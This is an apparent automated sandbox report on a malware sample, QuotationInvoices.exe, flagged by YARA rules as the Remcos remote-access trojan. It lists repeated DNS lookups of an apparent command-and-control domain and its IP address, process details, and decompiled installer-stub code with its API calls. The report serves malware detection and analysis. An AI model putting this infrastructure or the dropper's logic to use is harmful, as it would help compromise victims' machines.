Feb 22, 2021 13:59:15.077661991 CET	192.168.2.4	8.8.8.8	0xcfc	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:17.362710953 CET	192.168.2.4	8.8.8.8	0xd2d2	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:19.654303074 CET	192.168.2.4	8.8.8.8	0xf13f	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:21.991266966 CET	192.168.2.4	8.8.8.8	0x55fb	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:24.288728952 CET	192.168.2.4	8.8.8.8	0xa732	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:26.587452888 CET	192.168.2.4	8.8.8.8	0xb854	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:28.864841938 CET	192.168.2.4	8.8.8.8	0x698f	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:31.158606052 CET	192.168.2.4	8.8.8.8	0xe4e9	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:33.446224928 CET	192.168.2.4	8.8.8.8	0xc7e	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:35.753556967 CET	192.168.2.4	8.8.8.8	0x9f8f	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:38.046181917 CET	192.168.2.4	8.8.8.8	0x2a19	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:40.350781918 CET	192.168.2.4	8.8.8.8	0xc7dc	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:42.585230112 CET	192.168.2.4	8.8.8.8	0xcae	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:44.822701931 CET	192.168.2.4	8.8.8.8	0xbe0e	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 22, 2021 13:57:43.340078115 CET	8.8.8.8	192.168.2.4	0xde5a	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:45.843770027 CET	8.8.8.8	192.168.2.4	0x4f79	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:48.358426094 CET	8.8.8.8	192.168.2.4	0x76a7	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:50.798317909 CET	8.8.8.8	192.168.2.4	0x4057	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:53.067468882 CET	8.8.8.8	192.168.2.4	0xfcc3	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:55.343982935 CET	8.8.8.8	192.168.2.4	0x8df4	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:57.912153006 CET	8.8.8.8	192.168.2.4	0xfc4a	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:00.184590101 CET	8.8.8.8	192.168.2.4	0x18e3	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:02.469014883 CET	8.8.8.8	192.168.2.4	0x2294	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:04.741290092 CET	8.8.8.8	192.168.2.4	0x81e4	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:07.023207903 CET	8.8.8.8	192.168.2.4	0x4364	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:09.295730114 CET	8.8.8.8	192.168.2.4	0xcbb9	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:11.565102100 CET	8.8.8.8	192.168.2.4	0x3f87	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:14.198827982 CET	8.8.8.8	192.168.2.4	0x7c01	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:16.730441093 CET	8.8.8.8	192.168.2.4	0x4ec5	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:19.201297045 CET	8.8.8.8	192.168.2.4	0x4332	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:21.469583988 CET	8.8.8.8	192.168.2.4	0xf26c	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:23.743386030 CET	8.8.8.8	192.168.2.4	0xef30	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:26.021049976 CET	8.8.8.8	192.168.2.4	0xeef9	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:28.345366955 CET	8.8.8.8	192.168.2.4	0xa17b	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:30.781126022 CET	8.8.8.8	192.168.2.4	0xb344	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:33.146944046 CET	8.8.8.8	192.168.2.4	0x1aa5	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:35.408977985 CET	8.8.8.8	192.168.2.4	0x326b	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:37.674660921 CET	8.8.8.8	192.168.2.4	0xf5f2	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:39.944017887 CET	8.8.8.8	192.168.2.4	0x3eb2	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:42.212634087 CET	8.8.8.8	192.168.2.4	0x71df	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:44.507868052 CET	8.8.8.8	192.168.2.4	0xd87	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:46.812547922 CET	8.8.8.8	192.168.2.4	0xb6f8	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:49.105220079 CET	8.8.8.8	192.168.2.4	0xbe80	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:51.406141996 CET	8.8.8.8	192.168.2.4	0x7899	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:53.708487034 CET	8.8.8.8	192.168.2.4	0xf149	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:56.003597975 CET	8.8.8.8	192.168.2.4	0x2070	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:58.276984930 CET	8.8.8.8	192.168.2.4	0x43dc	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:00.550509930 CET	8.8.8.8	192.168.2.4	0x4f83	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:03.037074089 CET	8.8.8.8	192.168.2.4	0x27e1	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:05.966707945 CET	8.8.8.8	192.168.2.4	0x6128	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:08.274915934 CET	8.8.8.8	192.168.2.4	0x174f	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:10.552557945 CET	8.8.8.8	192.168.2.4	0x8d7	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:12.830398083 CET	8.8.8.8	192.168.2.4	0x3f68	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:15.137773037 CET	8.8.8.8	192.168.2.4	0xcfc	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:17.419770002 CET	8.8.8.8	192.168.2.4	0xd2d2	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:19.711353064 CET	8.8.8.8	192.168.2.4	0xf13f	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:22.049139977 CET	8.8.8.8	192.168.2.4	0x55fb	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:24.345722914 CET	8.8.8.8	192.168.2.4	0xa732	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:26.639040947 CET	8.8.8.8	192.168.2.4	0xb854	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:28.916455030 CET	8.8.8.8	192.168.2.4	0x698f	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:31.207633972 CET	8.8.8.8	192.168.2.4	0xe4e9	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:33.507658005 CET	8.8.8.8	192.168.2.4	0xc7e	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:35.802786112 CET	8.8.8.8	192.168.2.4	0x9f8f	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:38.108414888 CET	8.8.8.8	192.168.2.4	0x2a19	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:40.401925087 CET	8.8.8.8	192.168.2.4	0xc7dc	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:42.634088993 CET	8.8.8.8	192.168.2.4	0xcae	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:44.885376930 CET	8.8.8.8	192.168.2.4	0xbe0e	No error (0)	greatglass.servebeer.com	194.5.97.248	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: QuotationInvoices.exe PID: 7036 Parent PID: 5924

General

Start time:	13:57:38
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\QuotationInvoices.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\QuotationInvoices.exe'
Imagebase:	0x400000
File size:	528567 bytes
MD5 hash:	9C51E2991C6C9708D783AAB030DCC0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: QuotationInvoices.exe PID: 7072 Parent PID: 7036

General

Start time:	13:57:39
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\QuotationInvoices.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\QuotationInvoices.exe'
Imagebase:	0x400000
File size:	528567 bytes
MD5 hash:	9C51E2991C6C9708D783AAB030DCC0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: QuotationInvoices.exe PID: 7036 Parent PID: 5924 QuotationInvoices.exeCOMMON

Executed Functions

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\QuotationInvoices.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\QuotationInvoices.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\QuotationInvoices.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403496
0x0040349a
0x004034a2
0x004034a6
0x004034ab
0x004034b7
0x004034c0
0x004034c5
0x004034c8
0x004034cf
0x004034d6
0x004034d6
0x004034cf
0x004034d8
0x004034dd
0x004034de
0x004034ea
0x004034ee
0x004034f4
0x00403502
0x00403507
0x0040350e
0x00403512
0x00403516
0x00403518
0x00403518
0x00403516
0x00403520
0x00403527
0x0040352d
0x00403543
0x00403553
0x00403558
0x0040355e
0x00403565
0x00403571
0x0040357b
0x0040357d
0x0040357f
0x00403584
0x00403584
0x00403594
0x0040359a
0x00403663
0x00403663
0x00403665
0x00403667
0x00000000
0x00000000
0x004035a3
0x004035a6
0x004035ae
0x004035ae
0x004035b1
0x004035b6
0x004035b8
0x004035b8
0x004035b9
0x004035b9
0x004035be
0x004035c1
0x00403653
0x00403658
0x0040365d
0x00403660
0x00403662
0x00403662
0x00403662
0x00000000
0x004035c7
0x004035c7
0x004035c8
0x004035cb
0x004035e3
0x0040360e
0x00403610
0x00403623
0x0040364e
0x00403651
0x0040366f
0x00403672
0x0040367b
0x00403680
0x00403686
0x00403691
0x00403693
0x00403698
0x0040369a
0x004036f2
0x004036f7
0x00403701
0x00403708
0x0040370c
0x004037a0
0x004037a0
0x004037a5
0x004037ab
0x004037b0
0x004038d4
0x004038da
0x00403956
0x00403956
0x0040395b
0x0040395e
0x00403960
0x00403960
0x00403968
0x00403968
0x004038ea
0x004038f2
0x004038f4
0x004038f5
0x00403902
0x00403915
0x0040391d
0x00403921
0x00403921
0x00403929
0x0040392e
0x00403935
0x00403943
0x00403945
0x0040394b
0x0040394d
0x00000000
0x00000000
0x00000000
0x00403937
0x0040393d
0x0040393f
0x00403941
0x0040394f
0x00403951
0x00000000
0x00403951
0x00000000
0x00403941
0x00403935
0x004037bf
0x004037c6
0x004037c6
0x00403718
0x00403790
0x00403790
0x0040379c
0x00000000
0x0040379c
0x00403721
0x00403725
0x0040375b
0x0040375b
0x0040375d
0x00403765
0x004037d7
0x004037d9
0x004037e0
0x004037e8
0x004037e8
0x004037f3
0x004037f8
0x00403807
0x0040380b
0x0040380c
0x00403815
0x0040380e
0x0040380e
0x0040380e
0x0040381b
0x00403821
0x00403827
0x0040382f
0x0040382f
0x0040383d
0x00403842
0x00403854
0x0040385c
0x00403862
0x0040386e
0x00403874
0x0040387e
0x00403894
0x004038a5
0x004038ab
0x004038b2
0x004038b5
0x004038bb
0x004038bb
0x004038b2
0x004038bf
0x004038c5
0x004038c5
0x004038ca
0x004038ca
0x00000000
0x00403807
0x00403767
0x00403769
0x00403774
0x00000000
0x00000000
0x0040377c
0x00403787
0x0040378c
0x00000000
0x0040378c
0x00403750
0x00403752
0x00403756
0x00403759
0x00000000
0x00000000
0x00000000
0x00403759
0x00000000
0x00403752
0x004036a2
0x004036ae
0x004036b3
0x004036b8
0x004036ba
0x00000000
0x00000000
0x004036c2
0x004036ca
0x004036db
0x004036e3
0x004036e5
0x004036ea
0x004036ec
0x00000000
0x00000000
0x00000000
0x004036ec
0x00000000
0x00403651
0x00403612
0x00403615
0x00403618
0x0040361e
0x0040361e
0x0040361e
0x0040361e
0x00000000
0x0040361e
0x0040361a
0x0040361c
0x00000000
0x00000000
0x00000000
0x0040361c
0x004035cd
0x004035d0
0x004035d3
0x004035d9
0x004035d9
0x00000000
0x004035d9
0x004035d5
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035a8
0x004035a8
0x004035a8
0x004035a9
0x004035a9
0x00000000
0x004035a8
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 004034AB
GetVersion.KERNEL32 ref: 004034B1
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
OleInitialize.OLE32(00000000), ref: 00403527
SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
CharNextA.USER32(00000000,"C:\Users\user\Desktop\QuotationInvoices.exe" ,00000020,"C:\Users\user\Desktop\QuotationInvoices.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4

Part of subcall function 0040396E: CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
